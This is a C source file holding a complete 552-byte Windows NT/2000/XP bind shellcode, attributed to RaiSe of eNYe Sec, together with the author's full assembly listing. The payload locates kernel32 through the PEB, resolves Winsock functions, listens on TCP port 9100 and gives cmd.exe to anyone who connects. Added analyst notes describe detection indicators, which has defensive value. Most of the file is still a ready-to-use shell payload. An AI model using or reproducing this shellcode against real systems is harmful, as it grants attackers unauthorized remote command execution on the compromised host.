/*
 * Version: 0.1
 *
 * Bind shellcode by RaiSe
 * Works on Windows NT/2000/XP with all Service Packs
 *
 * Contains no NULs, line feeds, carriage returns or spaces:
 * (0x00, 0x0a, 0x0d, 0x20)
 *
 * Uses no hard-coded addresses
 * Gives a cmd shell on port 9100
 * Occupies 552 bytes
 *
 * eNYe Sec - http://www.enye-sec.org
 *
 * Analyst notes (everything below follows from the listing further down and
 * from the bytes themselves):
 *  - 32-bit x86, position independent: a call/pop obtains the payload's own
 *    address, kernel32 is located through the PEB (fs:[0x30]) and
 *    GetProcAddress by walking kernel32's export table, so no fixed DLL
 *    addresses are relied on.
 *  - The API names sit in cleartext at the end of the buffer, separated by
 *    0x08 bytes which the prologue overwrites with 0x00 at run time. The
 *    sequence "GetProcAddress\x08LoadLibraryA\x08ws2_32.dll\x08...\x08cmd\x08"
 *    is therefore a usable static indicator for this payload.
 *  - Behaviour: WSAStartup / WSASocketA / bind / listen / accept on TCP 9100,
 *    then CreateProcessA("cmd") with STARTF_USESTDHANDLES and all three
 *    standard handles set to the accepted socket, followed by ExitProcess.
 *    A cmd.exe whose standard handles are a socket, or an unexpected process
 *    listening on 9100, is the thing to alert on.
 *  - sizeof scode is 553: the 552 payload bytes plus the string literal's
 *    terminating NUL, which is not part of the payload.
 */

/* Raw payload bytes; see the assembly listing below for what each part does. */
char scode[] =
"\xeb\x08\x90\x90\x90\xeb\x08\x90\x90\x90\xe8\xf6\xff\xff\xff\x58\x66\x05\xaa"
"\x01\x8b\xd8\x24\xfc\x8d\x80\xac\xfd\xff\xff\x8b\xe8\x8d\x80\xac\xfe\xff\xff"
"\x8b\xe0\x89\x5d\x10\x32\xd2\x88\x53\x0e\x88\x53\x1b\x88\x53\x26\x88\x53\x31"
"\x88\x53\x3c\x88\x53\x41\x88\x53\x48\x88\x53\x4f\x88\x53\x5e\x88\x53\x6a\x88"
"\x53\x6e\x33\xd2\xb2\x30\x64\x8b\x1a\x8b\x5b\x0c\x8b\x5b\x0c\x8b\x1b\x8b\x1b"
"\x8b\x5b\x18\x89\x5d\x14\x8b\x7b\x3c\x03\xfb\x8b\x57\x78\x03\xd3\x8d\x4a\x1f"
"\x41\x8b\x01\x03\xc3\x33\xc9\x52\x8b\xd3\x50\x5b\x33\xc0\xfc\x8b\x3b\x03\xfa"
"\x8b\x75\x10\x33\xc9\xb1\x0e\xf3\xa6\x74\x0b\x90\x90\x90\x90\x83\xc3\x04\x40"
"\xeb\xe7\x90\x5a\x8b\xc8\x8b\x45\x14\x8b\x5a\x24\x03\xd8\x33\xff\x66\x8b\x3c"
"\x4b\x8b\x4a\x1c\x03\xc8\x8b\x34\xb9\x03\xf0\x89\x75\x18\x8b\x5d\x10\x8d\x5b"
"\x0f\x53\x8b\x4d\x14\x51\xff\xd6\x8d\x5b\x0c\x43\x53\xff\xd0\x89\x45\x1c\x8b"
"\xfb\x8b\xd0\x8d\x5d\x24\x33\xc9\xb1\x07\x51\x33\xc9\x49\x32\xc0\xf2\xae\x52"
"\x57\x52\x8b\x75\x18\xff\xd6\x5a\x89\x03\x43\x43\x43\x43\x59\x80\xf9\x03\x75"
"\x07\x90\x90\x90\x90\x8b\x55\x14\xe2\xda\x8d\x95\xfc\xfd\xff\xff\x52\x33\xd2"
"\x66\xba\x01\x01\x52\x8b\x5d\x24\xff\xd3\x33\xd2\x52\x52\x52\x52\x42\x52\x42"
"\x52\x8b\x5d\x28\xff\xd3\x89\x45\x40\x33\xd2\x52\x66\xba\x23\x8c\x66\x52\x66"
"\x33\xd2\xb2\x02\x66\x52\x8b\xdc\xb2\x16\x52\x53\x50\x8b\x75\x2c\xff\xd6\x33"
"\xd2\xb2\x05\x52\x8b\x55\x40\x52\x8b\x75\x30\xff\xd6\x33\xd2\xb2\x16\x52\x54"
"\x8d\x55\xb0\x52\x8b\x55\x40\x52\x8b\x75\x34\xff\xd6\x8b\xf0\x33\xc9\x66\xb9"
"\x21\x01\x66\x49\x8d\xbd\xb0\xfe\xff\xff\x33\xc0\xf3\xaa\x8d\xbd\xb0\xfe\xff"
"\xff\xc6\x07\x44\x89\x77\x38\x89\x77\x3c\x89\x77\x40\x66\xc7\x47\x2c\x01\x01"
"\x8d\x95\xb0\xfe\xff\xff\x8d\x52\xac\x52\x57\x33\xd2\x52\x52\x52\x42\x52\x4a"
"\x52\x52\x8b\x7d\x10\x8d\x7f\x6b\x57\x52\x8b\x75\x38\xff\xd6\x33\xd2\x52\x8b"
"\x75\x3c\xff\xd6\x47\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x08"
"\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x08\x77\x73\x32\x5f\x33\x32"
"\x2e\x64\x6c\x6c\x08\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x08\x57\x53\x41"
"\x53\x6f\x63\x6b\x65\x74\x41\x08\x62\x69\x6e\x64\x08\x6c\x69\x73\x74\x65\x6e"
"\x08\x61\x63\x63\x65\x70\x74\x08\x43\x72\x65\x61\x74\x65\x50\x72\x6f\x63\x65"
"\x73\x73\x41\x08\x45\x78\x69\x74\x50\x72\x6f\x63\x65\x73\x73\x08\x63\x6d\x64"
"\x08";

/*
 * ASM shellcode (the author's listing; comments translated to English).
 * Label glossary: salto = jump, ret_salto = return-jump, volver = back,
 * buscar = search, encontrada = found, mas_funciones = more functions,
 * no_k32 = not kernel32.
 *
 *         jmp salto
 * ret_salto:
 *         jmp volver
 * salto:
 *         call ret_salto
 * volver:
 *         pop eax
 *         add ax,01aah
 *         mov ebx,eax                 ; strings
 *         and al,0fch                 ; multiple of 4
 *         lea eax,[eax-254h]
 *         mov ebp,eax                 ; set up ebp
 *         lea eax,[eax-154h]
 *         mov esp,eax                 ; set up esp
 *         mov [ebp+10h],ebx           ; GetProcAddress string
 *
 *         ; 08h => 00h (turn the separators into string terminators)
 *         xor dl,dl
 *         mov byte ptr [ebx+0eh],dl
 *         mov byte ptr [ebx+1bh],dl
 *         mov byte ptr [ebx+26h],dl
 *         mov byte ptr [ebx+31h],dl
 *         mov byte ptr [ebx+3ch],dl
 *         mov byte ptr [ebx+41h],dl
 *         mov byte ptr [ebx+48h],dl
 *         mov byte ptr [ebx+4fh],dl
 *         mov byte ptr [ebx+5eh],dl
 *         mov byte ptr [ebx+6ah],dl
 *         mov byte ptr [ebx+6eh],dl
 *
 *         xor edx,edx
 *         mov dl,30h
 *         mov ebx,fs:[edx]
 *         mov ebx,[ebx+0ch]
 *         mov ebx,[ebx+0ch]
 *         mov ebx,[ebx]               ;
 *         mov ebx,[ebx]               ; kernel32
 *         mov ebx,[ebx+18h]           ; kernel32 base
 *         mov [ebp+14h],ebx           ; save k32
 *
 *         mov edi,[ebx+3ch]           ; pe header rva
 *         add edi,ebx
 *         mov edx,[edi+78h]           ; export table rva
 *         add edx,ebx
 *         lea ecx,[edx+1fh]
 *         inc ecx                     ; to avoid the 20h
 *         mov eax,[ecx]               ; name table rva
 *         add eax,ebx
 *         xor ecx,ecx
 *         push edx                    ; export table on the stack
 *         mov edx,ebx                 ; k32 in edx
 *         push eax
 *         pop ebx                     ; name table in ebx
 *         xor eax,eax
 *         cld
 *
 * buscar:                             ; find GetProcAddress
 *         mov edi,[ebx]               ; name table string
 *         add edi,edx
 *         mov esi,[ebp+10h]           ; 'GetProcAddress'
 *         xor ecx,ecx
 *         mov cl,0eh
 *         repe cmpsb
 *         je encontrada
 *         add ebx,04h
 *         inc eax
 *         jmp buscar
 *         nop                         ; avoid a 0x0a (in the je)
 *
 * encontrada:
 *         pop edx                     ; restore export table
 *         mov ecx,eax                 ; counter
 *         mov eax,[ebp+14h]           ; k32
 *         mov ebx,[edx+24h]           ; ordinal table rva
 *         add ebx,eax
 *         xor edi,edi
 *         mov di,word ptr [ebx+ecx*2] ; index
 *         mov ecx,[edx+1ch]           ; address table rva
 *         add ecx,eax
 *         mov esi,[ecx+edi*4]
 *         add esi,eax
 *         mov [ebp+18h],esi           ; address of GetProcAddress
 *
 *         ; block that resolves the function addresses
 *         mov ebx,[ebp+10h]
 *         lea ebx,[ebx+0fh]           ; LoadLibraryA string
 *         push ebx
 *         mov ecx,[ebp+14h]           ; k32 base
 *         push ecx
 *         call esi                    ; getprocaddress
 *         lea ebx,[ebx+0ch]           ; avoid a 0x0d
 *         inc ebx                     ; ws2_32.dll string
 *         push ebx
 *         call eax
 *         mov [ebp+1ch],eax           ; ws2_32 base
 *         mov edi,ebx
 *         mov edx,eax                 ; ws2_32 base in edx
 *         lea ebx,[ebp+24h]           ; where they are stored
 *         xor ecx,ecx
 *         mov cl,07h                  ; 7 functions
 *
 * mas_funciones:
 *         push ecx
 *         xor ecx,ecx
 *         dec ecx                     ; so ecx does not limit scasb
 *         xor al,al
 *         repne scasb                 ; edi points to the next string
 *         push edx                    ; save ws2_32 base
 *         push edi
 *         push edx
 *         mov esi,[ebp+18h]           ; GetProcAddress
 *         call esi
 *         pop edx                     ; restore ws2_32 base
 *         mov [ebx],eax
 *         inc ebx
 *         inc ebx
 *         inc ebx
 *         inc ebx                     ; where to store the next address
 *         pop ecx                     ; restore ecx
 *         cmp cl,03h
 *         jne no_k32
 *         mov edx,[ebp+14h]           ; now k32 base
 * no_k32:
 *         loop mas_funciones
 *
 *         ; call WSAStartup
 *         lea edx,[ebp-204h]
 *         push edx
 *         xor edx,edx
 *         mov dx,0101h
 *         push edx
 *         mov ebx,[ebp+24h]
 *         call ebx
 *
 *         ; WSASocketA
 *         xor edx,edx
 *         push edx
 *         push edx
 *         push edx
 *         push edx
 *         inc edx
 *         push edx
 *         inc edx
 *         push edx
 *         mov ebx,[ebp+28h]
 *         call ebx
 *         mov [ebp+40h],eax           ; socket descriptor
 *
 *         ; bind
 *         xor edx,edx
 *         push edx                    ; INADDR_ANY
 *         mov dx,8c23h                ; port 9100
 *         push dx
 *         xor dx,dx
 *         mov dl,02h                  ; AF_INET
 *         push dx
 *         mov ebx,esp
 *         mov dl,16h
 *         push edx
 *         push ebx
 *         push eax                    ; soc
 *         mov esi,[ebp+2ch]           ; bind
 *         call esi
 *
 *         ; listen
 *         xor edx,edx
 *         mov dl,05h                  ; backlog
 *         push edx
 *         mov edx,[ebp+40h]           ; soc
 *         push edx
 *         mov esi,[ebp+30h]           ; listen
 *         call esi
 *
 *         ; accept
 *         xor edx,edx
 *         mov dl,16h
 *         push edx
 *         push esp
 *         lea edx,[ebp-50h]
 *         push edx
 *         mov edx,[ebp+40h]           ; soc
 *         push edx
 *         mov esi,[ebp+34h]           ; accept
 *         call esi
 *         mov esi,eax                 ; soc2
 *
 *         ; CreateProcessA
 *         xor ecx,ecx
 *         mov cx,0121h                ; avoid 0x20
 *         dec cx
 *         lea edi,[ebp-150h]
 *         xor eax,eax
 *         rep stosb                   ; zero-initialise
 *         lea edi,[ebp-150h]          ; STARTUPINFO
 *         mov byte ptr [edi],44h
 *         mov [edi+38h],esi
 *         mov [edi+3ch],esi
 *         mov [edi+40h],esi
 *         mov word ptr [edi+2ch],0101h ; dwFlags STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
 *         lea edx,[ebp-150h]
 *         lea edx,[edx-54h]           ; PROCESS_INFORMATION
 *         push edx
 *         push edi
 *         xor edx,edx
 *         push edx
 *         push edx
 *         push edx
 *         inc edx
 *         push edx
 *         dec edx
 *         push edx
 *         push edx
 *         mov edi,[ebp+10h]
 *         lea edi,[edi+6bh]           ; cmd string
 *         push edi
 *         push edx
 *         mov esi,[ebp+38h]           ; CreateProcessA
 *         call esi
 *
 *         ; ExitProcess
 *         xor edx,edx
 *         push edx
 *         mov esi,[ebp+3ch]           ; ExitProcess
 *         call esi
 *
 *         db "GetProcAddress",8
 *         db "LoadLibraryA",8
 *         db "ws2_32.dll",8
 *         db "WSAStartup",8
 *         db "WSASocketA",8
 *         db "bind",8
 *         db "listen",8
 *         db "accept",8
 *         db "CreateProcessA",8
 *         db "ExitProcess",8
 *         db "cmd",8
 */

/* EOF */